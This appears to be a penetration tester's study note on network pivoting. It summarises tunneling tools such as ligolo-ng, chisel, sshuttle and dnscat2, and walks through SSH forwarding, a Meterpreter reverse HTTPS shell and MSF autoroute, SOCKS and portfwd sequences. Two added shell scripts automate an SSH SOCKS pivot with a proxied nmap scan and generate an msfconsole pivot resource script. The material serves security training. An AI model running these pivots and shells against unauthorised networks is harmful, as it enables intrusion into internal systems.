# Most Common Tools

- `ligolo-ng`
    - Admin privs not required on the pivot host (the agent runs unprivileged; only the proxy on the attack box needs a TUN interface)
    - No need for `proxychains4`
- `sshuttle`
    - Only works for pivoting over SSH (needs an SSH login on the pivot host)
    - No need for `proxychains4`
- `chisel`
    - TCP/UDP tunneling tool written in Go; transported over HTTP, secured with SSH
    - Single binary with both client and server modes
    - Requires `proxychains4` (exposes a SOCKS listener when run with `socks`)

![[images/Attachment-1.png]]

# Other Tools+Sequences

- SSH dynamic port forwarding
    - `ssh -D 9050 user@<external_ip_pivot_host>`
    - Then prepend `proxychains4` to commands to reach a different subnet accessible to the pivot host

![[images/Pasted image 20251024092630.png]]

- Remote-reverse HTTPS shell between Kali and a downstream Windows host
    - SSH reverse port forwarding between Kali and the pivot host
        - `ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ExternalIPofPivotHost> -vN`
        - Binding the remote listener to the pivot's internal IP (anything other than loopback) requires `GatewayPorts yes` or `GatewayPorts clientspecified` in the pivot's `sshd_config`; otherwise sshd silently binds to `127.0.0.1`
    - Meterpreter reverse HTTPS session between Kali and the downstream Windows host (payload `LHOST` = pivot internal IP, `LPORT` = 8080; the handler on Kali listens on 8000)
    - **Note**: Useful when SSH is unavailable on a target host such as a Windows machine, or when inbound connections to Kali are blocked by a FW

![[images/Pasted image 20251024092925.png]]

- Reverse TCP shell between Kali and the pivot host
    - MSF SOCKS proxy to the internal subnet
        - Add a route for the internal subnet through the `meterpreter` session using `autoroute` (`post/multi/manage/autoroute`)
        - Start the SOCKS proxy server (`auxiliary/server/socks_proxy`); it uses the MSF routing table, so traffic for the routed subnet goes through the session
        - Then prepend `proxychains4` to commands to reach a different subnet accessible to the pivot host
    - Single target port forwarding
        - Use the `meterpreter` `portfwd` command to forward, for example, RDP traffic from the Kali host to a specific downstream host in the internal subnet
    - Single target reverse port forwarding
        - Use `meterpreter` `portfwd add -R` to forward, for example, RDP traffic from a specific downstream host in the internal subnet to the Kali host

# Lesser Used Tools

- `socat`
    - Bidirectional relay tool that can pipe sockets between 2 independent network channels without SSH tunneling
    - Works with both bind and reverse shells
- `plink`
    - SSH dynamic port forwarding on Windows
- `rpivot`
    - Reverse SOCKS proxy tool written in Python for SOCKS tunneling
- `netsh`
    - Single target port forwarding on Windows (`netsh interface portproxy`)
- `dnscat2`
    - DNS tunneling
- `ptunnel-ng`
    - ICMP tunneling (TCP over ICMP echo); run SSH `-D` through the tunnel to get SOCKS
- `SocksOverRDP`
    - RDP tunneling using dynamic virtual channels (DVCs)
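The SSH dynamic-forward sequence from "Other Tools+Sequences" (start `ssh -D`, point `proxychains4` at it, scan the internal subnet) as a script. This is an added example, not from the original note: the user/host, the SOCKS port 9050, the internal target `10.10.10.5` and the config path are assumptions. It also shows two things the bullet list does not: `ExitOnForwardFailure=yes` so a failed bind is an error rather than a silent background `ssh`, and `nmap -sT -Pn -n` because a SOCKS proxy only carries TCP connect streams (SYN scans and ICMP pings never reach the internal subnet through `proxychains4`).

```shell
#!/bin/sh
# Added example (not from the original note): SSH SOCKS pivot + proxychains4.
# Assumed values: user@pivot, SOCKS port 9050, internal target 10.10.10.5.
set -eu

# Write a proxychains4 config pointing at the local SOCKS listener.
# proxy_dns resolves names through the proxy so lookups for internal hosts
# do not leak to Kali's own resolver.
write_proxychains_conf() {
    conf="$1"; port="$2"
    cat > "$conf" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 ${port}
EOF
    printf '%s\n' "$conf"
}

# Build the ssh -D command: -N (no remote shell), -f (background after auth),
# ExitOnForwardFailure so a port already in use makes ssh exit non-zero.
build_socks_cmd() {
    user_host="$1"; port="$2"
    printf 'ssh -f -N -D 127.0.0.1:%s -o ExitOnForwardFailure=yes %s' "$port" "$user_host"
}

# Build the ssh -R command for the reverse forward in the note: the pivot listens
# on <internal_ip>:<remote_port> and relays to Kali's 127.0.0.1:<local_port>.
# Binding to the pivot's internal IP needs GatewayPorts yes/clientspecified in its sshd_config.
build_reverse_cmd() {
    user_host="$1"; pivot_internal_ip="$2"; remote_port="$3"; local_port="$4"
    printf 'ssh -N -o ExitOnForwardFailure=yes -R %s:%s:127.0.0.1:%s %s' \
        "$pivot_internal_ip" "$remote_port" "$local_port" "$user_host"
}

# Poll until the SOCKS port is listening, so proxychains does not race the tunnel.
wait_for_listener() {
    port="$1"; i=0
    while [ "$i" -lt 20 ]; do
        if ss -ltn 2>/dev/null | grep -qE "[:.]${port}[[:space:]]"; then return 0; fi
        i=$((i + 1)); sleep 0.5
    done
    return 1
}

# Live run only when PIVOT is set, e.g. PIVOT=user@203.0.113.10 ./pivot.sh
if [ -n "${PIVOT:-}" ]; then
    CONF=$(write_proxychains_conf "${TMPDIR:-/tmp}/pc-pivot.conf" 9050)
    eval "$(build_socks_cmd "$PIVOT" 9050)"
    wait_for_listener 9050 || { echo "SOCKS listener on 9050 never came up" >&2; exit 1; }
    # -sT: full TCP connects (the only thing SOCKS relays); -Pn: skip host discovery
    # (ICMP/ARP cannot traverse the proxy); -n: hand nmap an IP, no DNS dance.
    proxychains4 -q -f "$CONF" nmap -sT -Pn -n --top-ports 20 10.10.10.5
fi
```

The `-f`/`-N` pair is the usual "tunnel only" form; drop `-f` if you want the forward to die with the terminal. Use `build_reverse_cmd` for the `-R` step of the reverse-HTTPS sequence; it binds the remote listener to the pivot's internal address, which is exactly the case that needs `GatewayPorts` enabled on the pivot's sshd.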
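The MSF sequence from "Other Tools+Sequences" (autoroute the internal subnet through the `meterpreter` session, start the SOCKS server, add forward and reverse `portfwd` entries) written as a generated msfconsole resource script, so the order of operations is fixed and repeatable instead of typed by hand. Added example, not from the original note: session id `1`, subnet `10.10.10.0/24`, SOCKS port `1080`, RDP target `10.10.10.5`, and the reverse-forward ports are assumptions. The `meterpreter` commands are sent with `sessions -C`, which runs a single Meterpreter command on the session given by `-i`.

```shell
#!/bin/sh
# Added example (not from the original note): emit an msfconsole .rc file for the
# autoroute -> socks_proxy -> portfwd pivot sequence. All values are assumptions.
set -eu

# Arguments: session id, subnet, netmask, SOCKS port, RDP target in the internal subnet.
write_msf_pivot_rc() {
    sid="$1"; subnet="$2"; netmask="$3"; socks_port="$4"; rdp_target="$5"
    cat <<EOF
# 1. Route the internal subnet through the meterpreter session (must come
#    before socks_proxy, which consults the MSF routing table per connection).
use post/multi/manage/autoroute
set SESSION ${sid}
set SUBNET ${subnet}
set NETMASK ${netmask}
run
route print

# 2. Start the SOCKS5 server on loopback only; proxychains4 points at it
#    (ProxyList line: socks5 127.0.0.1 ${socks_port}).
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT ${socks_port}
set VERSION 5
run -j

# 3. Single target forward: Kali 127.0.0.1:3389 -> ${rdp_target}:3389 via the session.
sessions -C "portfwd add -l 3389 -p 3389 -r ${rdp_target}" -i ${sid}

# 4. Single target reverse forward: the pivot listens on :8080 and relays each
#    connection back to Kali 127.0.0.1:8000 (where a handler or web server waits).
sessions -C "portfwd add -R -p 8080 -L 127.0.0.1 -l 8000" -i ${sid}

sessions -C "portfwd list" -i ${sid}
EOF
}

# Count the steps in a generated script; useful as a sanity check before running it.
count_rc_commands() {
    grep -cE '^(use|set|run|route|sessions) ' "$1"
}

# Live use: write the file, then `msfconsole -q -r pivot.rc` with session 1 already open.
if [ -n "${MSF_PIVOT_OUT:-}" ]; then
    write_msf_pivot_rc 1 10.10.10.0 255.255.255.0 1080 10.10.10.5 > "$MSF_PIVOT_OUT"
    echo "wrote $MSF_PIVOT_OUT with $(count_rc_commands "$MSF_PIVOT_OUT") commands"
fi
```

Step 3 is the `portfwd` flag mapping for a forward: `-l` is the Kali port to listen on, `-p`/`-r` the internal destination. Step 4 flips it with `-R`: `-p` becomes the port the pivot listens on, `-L`/`-l` the Kali-side address and port each inbound connection is relayed to. The same `proxychains4` caveat as for SSH applies: only TCP connects traverse the SOCKS server, so scan with `-sT -Pn`.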